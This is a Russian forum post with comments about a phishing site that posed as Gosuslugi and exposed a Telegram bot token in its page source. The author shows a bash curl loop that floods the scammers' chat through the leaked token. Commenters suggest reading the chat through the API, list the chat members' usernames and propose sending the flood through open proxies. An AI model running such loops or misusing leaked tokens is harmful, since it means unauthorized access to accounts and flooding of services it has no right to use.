2669

Лопухи1

Зашёл полистать новости, а там как всегда отбитые мошенники:

В МВД предупредили, что мошенники выманивают коды доступа от аккаунтов на "Госуслугах", предлагая зарегистрироваться в некой единой госсистеме оценивания студентов.

Ссылки выглядят легитимно: гесос. рус или gesos. ru, однако ведут на ресурс с намного менее презентабельным адресом

Зашёл посмотреть на этот сайт, в принципе ничего особенного: введите ФИО, паспорт, телефон, снилс, и мы всё пришлём. Ну ок, давайте посмотрим исходный код страницы. А там - прямым текстом указан ключ для бота телеги, который и скидывает злодеям в чатик всё что вы ввели.

Грех не воспользоваться такой ситуацией. Открываем консоль, пишем короткую команду:

while true; do
curl -XPOST https://api.telegram.org/bot7704374924:xxx/sendMessage \
-H 'Content-Type: application/json'\
-d "{\"chat_id\": \"-1002347034585\", \"text\": \"$(pwgen -nyc 1024 1)\"}";
sleep 2;
done

И идём курить. Для тех кто не понимает в чём суть - каждые 2 секунды бот отправляет своему хозяину 1024 символа отборного мусора.

После перекура с сожалением увидел в ответах от бота: "Forbidden: bot was kicked from the supergroup chat", т.е. бота выгнали из чата.

Штош, подождём пока обновят ключи API.

P.S. Подсказали как можно посмотреть участников чата. #comment_340692584

26
Автор поста оценил этот комментарий

https://api.telegram.org/bot{token}/getUpdates можно попробовать, правда не факт

раскрыть ветку (1)
123
Автор поста оценил этот комментарий

Найс. Участники чата:


Alex05091987

iikkmm9

myn1488

odmitriy1312

Namoment_bot

sss123ir

Drobach99

rulik1312

Fucking_Fucked_p

makovey1976

salvs17

rrooll11

yyaann1133

Drobach99

kvadroberDr

morkov_4a

показать ответы
123
Автор поста оценил этот комментарий

Найс. Участники чата:


Alex05091987

iikkmm9

myn1488

odmitriy1312

Namoment_bot

sss123ir

Drobach99

rulik1312

Fucking_Fucked_p

makovey1976

salvs17

rrooll11

yyaann1133

Drobach99

kvadroberDr

morkov_4a

раскрыть ветку (1)
88
Автор поста оценил этот комментарий

И переписка, чтобы 2 раза не вставать:


https://justpaste.it/djn5x

показать ответы
331
Автор поста оценил этот комментарий

Надо было не шум слать, а похожие на настоящие. Чтобы заебались разгребать мух от котлет.

раскрыть ветку (1)
117
Автор поста оценил этот комментарий

Вот тупанул, да. Но там через час-полтора домен уже разделегировали.

С другой стороны - пока генератор ФИО/СНИЛС напишешь, пока тесты, CI/CD, в кластер задеплоишь...

показать ответы
5
Автор поста оценил этот комментарий

Зачем писать это все с нуля каждый раз, если есть репозиторий со всем этим уже?

раскрыть ветку (1)
67
Автор поста оценил этот комментарий

Скажем так, мне и на работе ебли в последнее время хватает )
Пока был перерыв - закидал их говном, и дальше работать пошёл

показать ответы
2
Автор поста оценил этот комментарий

а в чем прикол использовать бота вместо бэка обычного?

раскрыть ветку (1)
41
Автор поста оценил этот комментарий

Студенты, похоже. Надёргали кода откуда могли

Хуяк-хуяк и в продакшн

показать ответы
12
Автор поста оценил этот комментарий

А ещё, чтоб по ip тоже не светилось и нельзя было фильтровать - через список http/socks открытых прокси.

Ну и на питоне это можно по запрос через прокси в каждом отдельном потоке пускать - чтоб быстрее было и больше уходило.

раскрыть ветку (1)
20
Автор поста оценил этот комментарий

Телега блокировать токен начинала, если слишком часто слать. Поэтому на 2 секунды поставил

показать ответы
21
Автор поста оценил этот комментарий

Кстати, зная ключ апи, можно глянуть, мож ещё в каких группах бот состоит

раскрыть ветку (1)
19
Автор поста оценил этот комментарий

Век живи - век учись.

Как узнать? У меня оба ключа в истории остались

показать ответы
10
Автор поста оценил этот комментарий

Маскировка бэка?


Если прямо урл указать- абуз хостингу улетит?

раскрыть ветку (1)
11
Автор поста оценил этот комментарий

Так домен и так светится. А уж куда бэк данные лить будет - никто не увидел бы

2
Автор поста оценил этот комментарий
Браво) задачу в крон кинул?)
раскрыть ветку (1)
6
Автор поста оценил этот комментарий

Там домен уже разделегировали.

Если б работал до сих пор, можно было бы и получше сделать

показать ответы
1
Автор поста оценил этот комментарий
А например? Если боту закрыли доступ в группу, это не значит что хозяин отрубил его вообще.
С апи можно сменить владельца?
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Не знаю, но часть разговоров выцепил:

#comment_340687976

0
Автор поста оценил этот комментарий

сайты эти пидаров лежат ))
посмотрел сохраненную копию
собственно кусок кода

Иллюстрация к комментарию
Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Но чатик до сих пор активен. Почитываю их переписку, но там ничего интересного

показать ответы

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы

Сообщества

Игры

Теги

Популярные авторы

Сообщества

Юмор

Теги

Популярные авторы

Сообщества

Отношения

Теги

Популярные авторы

Сообщества

Здоровье

Теги

Популярные авторы

Сообщества

Путешествия

Теги

Популярные авторы

Сообщества

Спорт

Теги

Популярные авторы

Сообщества

Хобби

Теги

Популярные авторы

Сообщества

Сервис

Теги

Популярные авторы

Сообщества

Природа

Теги

Популярные авторы

Сообщества

Бизнес

Теги

Популярные авторы

Сообщества

Транспорт

Теги

Популярные авторы

Сообщества

Общение

Теги

Популярные авторы

Сообщества

Юриспруденция

Теги

Популярные авторы

Сообщества

Наука

Теги

Популярные авторы

Сообщества

IT

Теги

Популярные авторы

Сообщества

Животные

Теги

Популярные авторы

Сообщества

Кино и сериалы

Теги

Популярные авторы

Сообщества

Экономика

Теги

Популярные авторы

Сообщества

Кулинария

Теги

Популярные авторы

Сообщества

История

Теги

Популярные авторы

Сообщества